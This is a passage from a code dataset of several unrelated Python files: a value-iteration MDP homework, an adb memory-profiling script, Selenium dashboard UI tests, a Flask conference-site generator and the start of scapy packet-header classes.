U[4], # down\r\n .8 * U[4] + .1 * U[1] + .1 * U[0])) # right\r\n if index_of_state == 7:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[7] + .1 * U[8] + .1 * U[4], # up\r\n .9 * U[7] + .1 * U[4], # left\r\n .8 * U[4] + .1 * U[8] + .1 * U[7], # down\r\n .8 * U[8] + .1 * U[7] + .1 * U[4])) # right\r\n if index_of_state == 8:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[7] + .1 * U[8] + .1 * U[9], # left\r\n .8 * U[8] + .1 * U[7] + .1 * U[9], # up\r\n .8 * U[9] + .1 * U[8] + .1 * U[7], # right\r\n .8 * U[8] + .1 * U[7] + .1 * U[9])) # down\r\n if index_of_state == 9:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[9] + .1 * U[8] + .1 * U[10], # up\r\n .9 * U[8] + .1 * U[9], # left\r\n .9 * U[5] + .1 * U[9], # down\r\n .8 * U[10] + .1 * U[5] + .1 * U[9])) # right\r\n if index_of_state == 10: # terminate\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[10] + .1 * U[9] + .1 * U[6], # up\r\n .9 * U[9] + .1 * U[10], # left\r\n .9 * U[6] + .1 * U[10], # down\r\n .9 * U[10] + .1 * U[6])) # right\r\n return uP\r\n\r\n\r\ndef valueIterations(S, A, P, R_states, discount, tr, error):\r\n \"\"\"\r\n :param S:\r\n :param A:\r\n :param P:\r\n :param R_states:\r\n :param discount:\r\n :param tr:\r\n :return:\r\n \"\"\"\r\n U = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n U_prime = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n\r\n U.astype(float)\r\n U_prime.astype(float)\r\n\r\n convergence = False\r\n i = 0\r\n oldV = []\r\n count = 0\r\n while not convergence:\r\n delta = -100 # arbitrary number\r\n count += 1\r\n U = U_prime # change old U to new U\r\n for s in S: # for state in state list\r\n i += 1 # iterate the counter\r\n oldV.append(s) # add old state to old states list\r\n uP = getExpectedUtility(S, s, discount) # get utility of state\r\n U_prime[getIndexOfState(S, s.x, s.y)] = uP\r\n\r\n #print((U_prime[getIndexOfState(S, s.x, s.y)])) # test\r\n #print(U[getIndexOfState(S, s.x, s.y)]) # test\r\n\r\n if (U_prime[getIndexOfState(S, s.x, s.y)] - U[getIndexOfState(S, s.x, s.y)]) > delta: # calculate the difference\r\n delta = U_prime[getIndexOfState(S, s.x, s.y)] - U[getIndexOfState(S, s.x, s.y)] # if the difference is greater replace delta\r\n\r\n if delta < .000001: # .000001 is placeholder value\r\n convergence = True\r\n\r\n return U\r\n\r\n\r\n#### Below is provided by class ####\r\n\r\ndef main():\r\n # Call value iteration function\r\n U = valueIterations(S, A, P, R_states, discount, tr, 2)\r\n print('\\n\\n\\n')\r\n print('Utilities: \\n%s' % U)\r\n\r\n # List of terminal state indices\r\n i_terminal_states = [6, 10]\r\n\r\n policy = getPolicyForGrid(S, U, A, P, i_terminal_states)\r\n print('Policy: %s' % policy)\r\n\r\n # Print the policy\r\n # Last parameter is list of obstacle indices\r\n # printPolicyForGrid(policy, w, h, [5])\r\n\r\n\r\nmain()\r\n","sub_path":"Artificial Intelligence HW/Value Iteration for an MDP/YoxsimerThomasMDP.py","file_name":"YoxsimerThomasMDP.py","file_ext":"py","file_size_in_byte":7620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"553023668","text":"#cd /Users/panluobu/Documents/Mem\r\n#python memp.py\r\nimport re\r\nimport os\r\nimport sys\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get(msg):\r\n PN = input(msg)\r\n if PN=='':\r\n PN = 'com.panda.unity.blastsaga'\r\n return PN\r\n\r\nPackName = get(\"please input Packname:\")\r\nsquares = []\r\nsquares1 = []\r\n\r\nmins = 0\r\nsec = 10\r\n\r\nfor i in range(60*mins + sec):\r\n# print(\"adb shell dumpsys meminfo \" + PackName)\r\n content = os.popen(\"adb shell dumpsys meminfo \" + PackName).read() \r\n string = str(content)\r\n f2 = open(\"memp.txt\", 'r+')\r\n f2.seek(0, os.SEEK_END) \r\n\r\n result0 = re.findall(\".*TOTAL:(.*)TOTAL.*\", string)\r\n result1 = ''.join(result0)\r\n\r\n result2 = re.compile(r' ')\r\n result3 = result2.sub('', str(result1))\r\n result = ''.join(result3)\r\n\r\n squares.append(result)\r\n\r\n for y in result:\r\n s = str(y)\r\n f2.write(s)\r\n f2.write('\\n')\r\n f2.close()\r\n print (str(i) + '. ' +result)\r\n time.sleep(1) \r\n\r\nfor s in squares:\r\n s1 = int(int(s)/1024)\r\n print(s1)\r\n squares1.append(s1)\r\n\r\nplt.title(PackName)\r\nplt.xlabel(\"Time\")\r\nplt.ylabel(\"Men\")\r\n#plt.xlim(0, 60*mins+sec-1)\r\nplt.ylim(0, 500)\r\nplt.plot(squares1)\r\nplt.show()\r\n\r\nprint (\"ok\")","sub_path":"mem-master.py","file_name":"mem-master.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"50034009","text":"from ui.zbUIShared import clickSpecificTimerange\nimport sys, os, pytest\n\ntry:\n zbathome = os.environ['ZBAT_HOME']\nexcept:\n print('Test cannot run. Please export ZBAT_HOME.')\n sys.exit()\n\nif zbathome+'lib' not in sys.path:\n sys.path.append(zbathome+'lib')\n\nfrom ui.dashboard.zbUIDashboardSummary import DashboardSummary\nfrom common.zbSelenium import zbSelenium\nfrom common.zbCommon import rerunIfFail\nfrom common.zbConfig import NUMBER_RETRIES, DELAY_SECONDS, SCREENSHOT_ON_FAIL\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# fixture\n@pytest.fixture(scope=\"module\")\ndef browser(browser_factory):\n browser = browser_factory(DashboardSummary)\n return browser[\"selenium\"]\n\n@pytest.mark.smoke\n@pytest.mark.parametrize(\"testid\", [\"C363021\"])\ndef test_global_filters(testid, browser):\n \"\"\" Smoke -- Verify Global Filters elements appear \"\"\"\n assert rerunIfFail(function=browser.verifyGlobalFilters(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.bugs\n@pytest.mark.regression\n@pytest.mark.parametrize(\"testid\", [\"C360806\"])\ndef test_global_filters_reg(testid, browser):\n \"\"\" Regression -- Verify selecting different Global Filters changes values in Top Bar Widget \"\"\"\n assert rerunIfFail(function=browser.verifyGlobalFiltersOnTopBar(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.regression\n@pytest.mark.parametrize(\"testid\", [\"C360814\"])\ndef test_dashboard_summary_protocols(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryProtocols(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360807\"])\n@pytest.mark.regression\ndef test_dashboard_summary_apps(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryApplications(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360820\"])\n@pytest.mark.regression\ndef test_dashboard_summary_networks(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryNetworks(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360821\"])\n@pytest.mark.regression\ndef test_dashboard_summary_vuln(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryVuln(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360822\"])\n@pytest.mark.regression\ndef test_dashboard_summary_alerts(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryAlerts(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360823\"])\n@pytest.mark.regression\ndef test_dashboard_summary_risks(testid, browser):\n assert rerunIfFail(function=browser.regDashboardSummaryRisks(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360805\"])\n@pytest.mark.regression\ndef test_dashboard_summary_reg(testid, browser):\n clickSpecificTimerange(browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.checkTopBar(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n clickSpecificTimerange(browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.checkDeviceCard(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n clickSpecificTimerange(browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.checkSiteCard(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n\n@pytest.mark.parametrize(\"testid\", [\"C360802\"])\n@pytest.mark.smoke\n@pytest.mark.parametrize(\"test_id\", [(\"TC_DASHBOARD_001::Smoke::Verify Dashboard Summary Page\")])\ndef test_dashboard_summary(testid, test_id, browser):\n \"\"\" Smoke -- Verify all the items in Dashboard Summary Page can be loaded \"\"\"\n clickSpecificTimerange(browserobj=browser.selenium, specific=\"1 Month\")\n assert rerunIfFail(function=browser.verifyDashboardSummaryTop(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryGeneral(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryDevices(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummarySites(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryApplications(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryProtocols(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True \n assert rerunIfFail(function=browser.verifyDashboardSummaryNetworkSegments(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryAlerts(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryVulnerabilities(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n assert rerunIfFail(function=browser.verifyDashboardSummaryRiskOverview(), selenium=browser.selenium, \\\n number=NUMBER_RETRIES, delay=DELAY_SECONDS) == True\n","sub_path":"tests/ui/test_dashboard_summary.py","file_name":"test_dashboard_summary.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"101981287","text":"# pylint: disable=global-statement,redefined-outer-name\nimport argparse\nimport collections\nimport csv\nimport glob\nimport json\nimport os\n\nimport dateutil.parser\nimport yaml\nfrom flask import Flask, jsonify, redirect, render_template, send_from_directory\nfrom flask_frozen import Freezer\nfrom flaskext.markdown import Markdown\nfrom flask_minify import minify\n\n\nsite_data = {}\nby_uid = {}\nby_day = {}\nby_time = {}\n\ndef main(site_data_path):\n global site_data, extra_files\n extra_files = [\"README.md\"]\n # Load all for your sitedata one time.\n for f in glob.glob(site_data_path + \"/*\"):\n extra_files.append(f)\n name, typ = f.split(\"/\")[-1].split(\".\")\n if typ == \"json\":\n site_data[name] = json.load(open(f))\n elif typ in {\"csv\", \"tsv\"}:\n site_data[name] = list(csv.DictReader(open(f, encoding='utf-8-sig')))\n elif typ == \"yml\":\n site_data[name] = yaml.load(open(f).read(), Loader=yaml.SafeLoader)\n\n for typ in [\"paper_list\", \"speakers\", \"workshops\", \"session_list\"]:\n by_uid[typ] = {}\n\n if typ == \"session_list\":\n by_uid[\"events\"] = {}\n by_uid[\"sessions\"] = {}\n\n for session_id, p in site_data[typ].items():\n by_uid[\"events\"][session_id] = p\n\n # also iterate through each session within each event\n for timeslot in p[\"sessions\"]:\n # also put some parent info back into this item\n fq_timeslot = timeslot.copy()\n fq_timeslot.update({\n \"event\": p[\"event\"],\n \"event_type\": p[\"event_type\"],\n \"parent_id\": session_id,\n \"event_description\": p[\"event_description\"],\n \"event_url\": p[\"event_url\"],\n })\n\n by_uid['sessions'][timeslot['session_id']] = fq_timeslot\n\n by_uid[\"sessions\"][timeslot[\"session_id\"]] = fq_timeslot\n\n elif typ == \"paper_list\":\n for paper_id, p in site_data[typ].items():\n by_uid[typ][paper_id] = p\n\n else:\n for p in site_data[typ]:\n by_uid[typ][p[\"UID\"]] = p\n\n # organize sessions by day (calendar)\n for session in by_uid[\"sessions\"].values():\n this_date = dateutil.parser.parse(session[\"time_start\"])\n day = this_date.strftime(\"%A\")\n if day not in by_day:\n by_day[day] = []\n\n by_day[day].append(format_by_session_list(session))\n\n # organize sessions by timeslot (linking simultaneous sessions together)\n for day, day_sessions in by_day.items():\n time_sessions = {}\n for session in day_sessions:\n timeslot = session[\"startTime\"] + \"|\" + session[\"endTime\"]\n if timeslot not in time_sessions:\n this_date = dateutil.parser.parse(session[\"startTime\"])\n time_sessions[timeslot] = {\n \"sessions\": [],\n \"date\": this_date.strftime(\"%A, %d %b %Y\"),\n \"startTime\": session[\"startTime\"],\n \"endTime\": session[\"endTime\"],\n }\n\n time_sessions[timeslot][\"sessions\"].append(session)\n\n by_time[day] = collections.OrderedDict(sorted(time_sessions.items()))\n\n ## TODO: add paper information to session information\n\n print(\"Data Successfully Loaded\")\n return extra_files\n\n\n# main() should be called before this function\ndef generateDayCalendars():\n if len(by_day) == 0:\n raise Exception(\"call main() before this function\")\n\n all_events = []\n for day in by_day:\n day_events = []\n for session in by_day[day]:\n session_event = {\n \"id\": session[\"id\"],\n \"title\": session[\"fullTitle\"],\n \"start\": session[\"calendarDisplayStartTime\"],\n \"realStart\": session[\"startTime\"],\n \"end\": session[\"endTime\"],\n # \"location\": session['youtube'],\n \"location\": \"/session_\" + session[\"id\"] + \".html\",\n \"link\": \"http://virtual.ieeevis.org/session_\" + session[\"id\"] + \".html\",\n \"category\": \"time\",\n \"calendarId\": session[\"type\"],\n }\n day_events.append(session_event)\n\n calendar_fname = \"calendar_\" + day + \".json\"\n # full_calendar_fname = os.path.join(site_data_path, calendar_fname)\n # with open(full_calendar_fname, 'w', encoding='utf-8') as f:\n # json.dump(day_events, f, ensure_ascii=False, indent=2)\n\n # try ordering by title; maybe this'll make things line up in the calendar?\n day_events = sorted(day_events, key=lambda event: event['title'])\n\n site_data[calendar_fname] = day_events\n all_events.extend(day_events)\n\n # for the purposes of simplifying the main schedule, group by start/end times; merge times together; make location the appropriate tab\n # aggregated_events = []\n # timeslots = set(map(lambda event: event['start'] + \"|\" + event['end'], day_events))\n # for timeslot in timeslots:\n # timeslot_events = []\n # for event in day_events:\n # timeslot_string = event['start']+ \"|\" + event['end']\n # if timeslot_string == timeslot:\n # timeslot_events.append(event)\n\n # agg_event = {\n # \"id\": timeslot,\n # \"title\": \", \".join(map(lambda event: event['title'], timeslot_events)),\n # \"start\": session['startTime'],\n # \"end\": session['endTime'],\n # # \"location\": session['youtube'],\n # \"location\": \"#tab-\" + day,\n # \"link\": \"http://virtual.ieeevis.org/schedule.html#tab-\" + day + \".html\",\n # \"category\": \"time\",\n # \"calendarId\": \"\",\n # }\n # aggregated_events.append(agg_event)\n\n # all_events.extend(aggregated_events)\n\n # overwrite static main_calendar json with all assembled events\n site_data[\"main_calendar\"] = all_events\n\n\n# ------------- SERVER CODE -------------------->\n\napp = Flask(__name__)\napp.config.from_object(__name__)\nfreezer = Freezer(app)\nmarkdown = Markdown(app)\n\n\n# MAIN PAGES\n\n\ndef _data():\n data = {}\n data[\"config\"] = site_data[\"config\"]\n return data\n\n\n@app.route(\"/\")\ndef index():\n return redirect(\"/index.html\")\n\n\n@app.route(\"/favicon.png\")\ndef favicon():\n return send_from_directory(site_data_path, \"favicon.png\")\n\n\n# TOP LEVEL PAGES\n\n\n@app.route(\"/index.html\")\ndef home():\n data = _data()\n data[\"readme\"] = open(\"README.md\").read()\n data[\"supporters\"] = site_data[\"supporters\"]\n return render_template(\"index.html\", **data)\n\n\n@app.route(\"/help.html\")\ndef about():\n data = _data()\n data[\"discord\"] = open(\"discord_guide.md\").read()\n data[\"FAQ\"] = site_data[\"faq\"][\"FAQ\"]\n return render_template(\"help.html\", **data)\n\n\n@app.route(\"/papers.html\")\ndef papers():\n data = _data()\n # data[\"papers\"] = site_data[\"papers\"]\n return render_template(\"papers.html\", **data)\n\n\n@app.route(\"/paper_vis.html\")\ndef paper_vis():\n data = _data()\n return render_template(\"papers_vis.html\", **data)\n\n\n@app.route(\"/calendar.html\")\ndef schedule():\n data = _data()\n\n data[\"days\"] = {}\n for day in by_day:\n data[\"days\"][day] = {\"timeslots\": by_time[day]}\n\n return render_template(\"schedule.html\", **data)\n\n\n@app.route(\"/events.html\")\ndef events():\n data = _data()\n all_events = [format_session_as_event(event_item, event_uid) for event_uid, event_item in by_uid['events'].items()]\n data['events'] = sorted(all_events, key=lambda e: e['abbr_type'])\n data['event_types'] = sorted(list(set([(e['type'], e[\"abbr_type\"]) for e in all_events])), key=lambda x: x[0])\n data['colors'] = data['config']['calendar']['colors']\n return render_template(\"events.html\", **data)\n\n\n# ALPER TODO: we should just special-case particular sessions and render them under this route\n@app.route(\"/workshops.html\")\ndef workshops():\n data = _data()\n data[\"workshops\"] = [\n format_workshop(workshop) for workshop in site_data[\"workshops\"]\n ]\n return render_template(\"workshops.html\", **data)\n\n\ndef extract_list_field(v, key):\n value = v.get(key, \"\")\n if isinstance(value, list):\n return value\n if value.find(\"|\") != -1:\n return value.split(\"|\")\n else:\n return value.split(\",\")\n\n\ndef format_paper(v):\n list_keys = [\"authors\", \"keywords\"]\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n paper_session = by_uid[\"sessions\"][v[\"session_id\"]]\n paper_event = by_uid[\"events\"][paper_session[\"parent_id\"]]\n\n return {\n \"id\": v[\"uid\"],\n \"title\": v[\"title\"],\n \"authors\": list_fields[\"authors\"],\n \"keywords\": list_fields[\"keywords\"],\n \"abstract\": v[\"abstract\"],\n \"time_stamp\": v[\"time_stamp\"],\n \"session_id\": v[\"session_id\"],\n \"session_title\": paper_session[\"title\"],\n \"event_id\": paper_session[\"parent_id\"],\n \"event_title\": paper_event[\"event\"],\n \"award\": v[\"paper_award\"],\n \"has_image\": v[\"has_image\"],\n \"image_caption\": v[\"image_caption\"],\n \"external_paper_link\": v[\"external_paper_link\"],\n \"youtube_ff_url\": v[\"ff_link\"],\n \"youtube_ff_id\": v[\"ff_link\"].split(\"/\")[-1] if v[\"ff_link\"] else None,\n\n # for papers.html:\n \"sessions\": [paper_session[\"title\"]],\n \"UID\": v[\"uid\"],\n }\n\n\ndef format_paper_list(v):\n list_keys = [\"authors\"]\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n return {\n \"id\": v[\"uid\"],\n \"title\": v[\"title\"],\n \"authors\": list_fields[\"authors\"],\n \"award\": v[\"paper_award\"],\n ## eventually, FF/DOI?\n }\n\n\n## new format for paper_list.json\n# def format_paper_list(v):\n# return {\n# \"id\": v['uid'],\n# \"forum\": v['uid'].split('-')[1],\n# \"content\": {\n# \"title\": v[\"title\"],\n# \"authors\": v[\"authors\"],\n# \"session\": v[\"session_id\"],\n# \"time_stamp\": v[\"time_stamp\"],\n# }\n# }\n\n\ndef format_workshop(v):\n list_keys = [\"authors\"]\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n return {\n \"id\": v[\"UID\"],\n \"title\": v[\"title\"],\n \"organizers\": list_fields[\"authors\"],\n \"abstract\": v[\"abstract\"],\n }\n\n\ndef format_session_as_event(v, uid):\n list_keys = ['Organizers']\n list_fields = {}\n for key in list_keys:\n list_fields[key] = extract_list_field(v, key)\n\n return {\n \"id\": uid,\n \"title\": v[\"long_name\"],\n \"type\": v[\"event_type\"],\n \"abbr_type\": v[\"event_type\"].split(\" \")[0].lower(),\n \"abstract\": v[\"event_description\"],\n \"url\": v[\"event_url\"],\n \"startTime\": v[\"sessions\"][0][\"time_start\"],\n \"endTime\": v[\"sessions\"][-1][\"time_end\"],\n \"sessions\": [format_by_session_list(by_uid[\"sessions\"][timeslot[\"session_id\"]]) for timeslot in v[\"sessions\"]],\n }\n\n\n# new format for session_list.json\ndef format_session_list(v):\n return {\n \"id\": v[\"session_id\"],\n \"title\": v[\"title\"],\n \"type\": v[\"session_id\"][0], # first character designates type\n \"startTime\": v[\"time_start\"],\n \"endTime\": v[\"time_end\"],\n \"timeSlots\": v[\"time_slots\"],\n }\n\n\ndef format_by_session_list(v):\n fullTitle = v[\"event\"]\n redundantTitle = True\n if v[\"event\"].lower() != v[\"title\"].lower():\n fullTitle += \": \" + v[\"title\"]\n redundantTitle = False\n\n return {\n \"id\": v[\"session_id\"],\n \"title\": v[\"title\"],\n \"type\": v[\"event_type\"]\n .split(\" \")[0]\n .lower(), # get first word, which should be good enough...\n \"chair\": v[\"chair\"],\n \"organizers\": v[\"organizers\"],\n \"calendarDisplayStartTime\": v[\"display_start\"],\n \"startTime\": v[\"time_start\"],\n \"endTime\": v[\"time_end\"],\n \"timeSlots\": v[\"time_slots\"],\n \"event\": v[\"event\"], # backloaded from parent event\n \"event_type\": v[\"event_type\"], # backloaded from parent event\n \"parent_id\": v[\"parent_id\"], # backloaded from parent event\n \"event_description\": v[\"event_description\"], # backloaded from parent event\n \"event_url\": v[\"event_url\"], # backloaded from parent event\n \"fullTitle\": fullTitle,\n \"redundantTitle\": redundantTitle,\n \"discord_category\": v[\"discord_category\"],\n \"discord_channel\": v[\"discord_channel\"],\n \"discord_channel_id\": v[\"discord_channel_id\"],\n \"youtube_url\": v[\"youtube_url\"],\n \"youtube_id\": v[\"youtube_url\"].split(\"/\")[-1] if v[\"youtube_url\"] else None,\n \"ff_playlist\": v[\"ff_playlist\"],\n \"ff_playlist_id\": v[\"ff_playlist\"].split(\"=\")[-1] if v[\"ff_playlist\"] else None,\n # \"zoom_meeting\": v[\"zoom_meeting\"]\n }\n\n\n# ITEM PAGES\n\n\n@app.route(\"/paper_.html\")\ndef paper(paper):\n uid = paper\n v = by_uid[\"paper_list\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"paper\"] = format_paper(v)\n return render_template(\"paper.html\", **data)\n\n\n# ALPER TODO: get keynote info\n@app.route(\"/speaker_.html\")\ndef speaker(speaker):\n uid = speaker\n v = by_uid[\"speakers\"][uid]\n data = _data()\n data[\"speaker\"] = v\n return render_template(\"speaker.html\", **data)\n\n@app.route(\"/awards.html\")\ndef awards():\n data = _data()\n data[\"awards_honor\"] = site_data[\"awards_honor\"]\n data[\"awards_tot\"] = site_data[\"awards_tot\"]\n data[\"awards_academy\"] = site_data[\"awards_academy\"]\n data[\"awards_papers\"] = site_data[\"awards_papers\"]\n return render_template(\"awards.html\", **data)\n\n\n@app.route(\"/speakers.html\")\ndef speakers():\n data = _data()\n data[\"speakers\"] = site_data[\"speakers\"]\n return render_template(\"speakers.html\", **data)\n\n# ALPER TODO: populate the workshop list from session_list\n@app.route(\"/workshop_.html\")\ndef workshop(workshop):\n uid = workshop\n v = by_uid[\"workshops\"][uid]\n data = _data()\n data[\"workshop\"] = format_workshop(v)\n return render_template(\"workshop.html\", **data)\n\n\n@app.route('/session_vis-keynote.html')\ndef keynote():\n uid = \"vis-keynote\"\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n data[\"session\"][\"speaker\"] = site_data[\"speakers\"][0]\n return render_template(\"keynote_or_capstone.html\", **data)\n\n\n@app.route('/session_vis-capstone.html')\ndef capstone():\n uid = \"vis-capstone\"\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n data[\"session\"][\"speaker\"] = site_data[\"speakers\"][1]\n return render_template(\"keynote_or_capstone.html\", **data)\n\n@app.route(\"/session_x-posters.html\")\ndef poster_session():\n uid = \"x-posters\"\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n data[\"event\"] = format_session_as_event(by_uid['events'][uid], uid)\n if uid in site_data[\"event_ff_playlists\"]:\n data[\"event\"][\"ff_playlist\"] = site_data[\"event_ff_playlists\"][uid]\n data[\"event\"][\"ff_playlist_id\"] = site_data[\"event_ff_playlists\"][uid].split(\"=\")[-1]\n return render_template(\"poster_session.html\", **data)\n\n\n@app.route(\"/session_.html\")\ndef session(session):\n uid = session\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n return render_template(\"session.html\", **data)\n\n\n@app.route('/event_.html')\ndef event(event):\n uid = event\n v = by_uid['events'][uid]\n data = _data()\n data[\"event\"] = format_session_as_event(v, uid)\n if uid in site_data[\"event_ff_playlists\"]:\n data[\"event\"][\"ff_playlist\"] = site_data[\"event_ff_playlists\"][uid]\n data[\"event\"][\"ff_playlist_id\"] = site_data[\"event_ff_playlists\"][uid].split(\"=\")[-1]\n return render_template(\"event.html\", **data)\n\n\n# ALPER TODO: there should be a single poster page; redirect to iPosters\n@app.route(\"/posters.html\")\ndef posters():\n data = _data()\n data[\"requires_auth\"] = True\n return render_template(\"posters.html\", **data)\n\n## Internal only; used to generate markdown-like list for main website paper list\n@app.route(\"/paperlist.html\")\ndef allpapers():\n data = _data()\n data[\"papers\"] = {\n 'full': [],\n 'short': [],\n }\n for uid, v in site_data[\"paper_list\"].items():\n if uid[0] == \"f\":\n data['papers']['full'].append(format_paper_list(v))\n if uid[0] == \"s\":\n data['papers']['short'].append(format_paper_list(v))\n\n return render_template(\"paperlist.html\", **data)\n\n\n# ALPER TODO: remove\n@app.route(\"/chat.html\")\ndef chat():\n data = _data()\n return render_template(\"chat.html\", **data)\n\n\n@app.route(\"/redirect.html\")\ndef redirect_page():\n data = _data()\n data[\"requires_auth\"] = True\n return render_template(\"redirect.html\", **data)\n\n\n# FRONT END SERVING\n\n@app.route(\"/papers.json\")\ndef paper_json():\n json = []\n for v in site_data[\"paper_list\"].items():\n json.append(format_paper(v[1]))\n return jsonify(json)\n\n\n@app.route(\"/static/\")\ndef send_static(path):\n return send_from_directory(\"static\", path)\n\n\n@app.route(\"/serve_.json\")\ndef serve(path):\n return jsonify(site_data[path])\n\n\n# --------------- DRIVER CODE -------------------------->\n# Code to turn it all static\n\n\n@freezer.register_generator\ndef generator():\n for paper in site_data[\"paper_list\"].values():\n yield \"paper\", {\"paper\": str(paper[\"uid\"])}\n for speaker in site_data[\"speakers\"]:\n yield \"speaker\", {\"speaker\": str(speaker[\"UID\"])}\n for workshop in site_data[\"workshops\"]:\n yield \"workshop\", {\"workshop\": str(workshop[\"UID\"])}\n for session in by_uid[\"sessions\"].keys():\n yield \"session\", {\"session\": str(session)}\n for event in by_uid[\"events\"].keys():\n yield \"event\", {\"event\": str(event)}\n\n for key in site_data:\n yield \"serve\", {\"path\": key}\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"MiniConf Portal Command Line\")\n\n parser.add_argument(\n \"--build\",\n action=\"store_true\",\n default=False,\n help=\"Convert the site to static assets\",\n )\n\n parser.add_argument(\n \"-b\",\n action=\"store_true\",\n default=False,\n dest=\"build\",\n help=\"Convert the site to static assets\",\n )\n\n parser.add_argument(\"path\", help=\"Pass the JSON data path and run the server\")\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n\n site_data_path = args.path\n extra_files = main(site_data_path)\n\n generateDayCalendars()\n\n if args.build:\n minify(app=app, html=True, js=False, cssless=True)\n freezer.freeze()\n else:\n debug_val = False\n if os.getenv(\"FLASK_DEBUG\") == \"True\":\n debug_val = True\n\n app.run(port=5000, debug=debug_val, extra_files=extra_files)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"185001413","text":"from scapy.all import *\n\n##class definitions\nclass Ethernet(Packet):\n\tname = 'ethernet'\n\tfields_desc = [\n\t\tXBitField('dstAddr', 0, 48),\n\t\tXBitField('srcAddr', 0, 48),\n\t\tXShortField('etherType', 0),\n\t]\nclass Ipv4(Packet):\n\tname = 'ipv4'\n\tfields_desc = [\n\t\tXBitField('version', 0, 4),\n\t\tXBitField('ihl', 0, 4),\n\t\tXByteField('diffserv', 0),\n\t\tXShortField('totalLen', 0),\n\t\tXShortField('identification', 0),\n\t\tXBitField('flags', 0, 3),\n\t\tXBitField('fragOffset', 0, 13),\n\t\tXByteField('ttl', 0),\n\t\tXByteField('protocol', 0),\n\t\tXShortField('hdrChecksum', 0),\n\t\tXLongField('srcAddr', 0),\n\t\tXLongField('dstAddr', 0),\n\t]\n\t#update hdrChecksum over [[u'ipv4', u'version'], 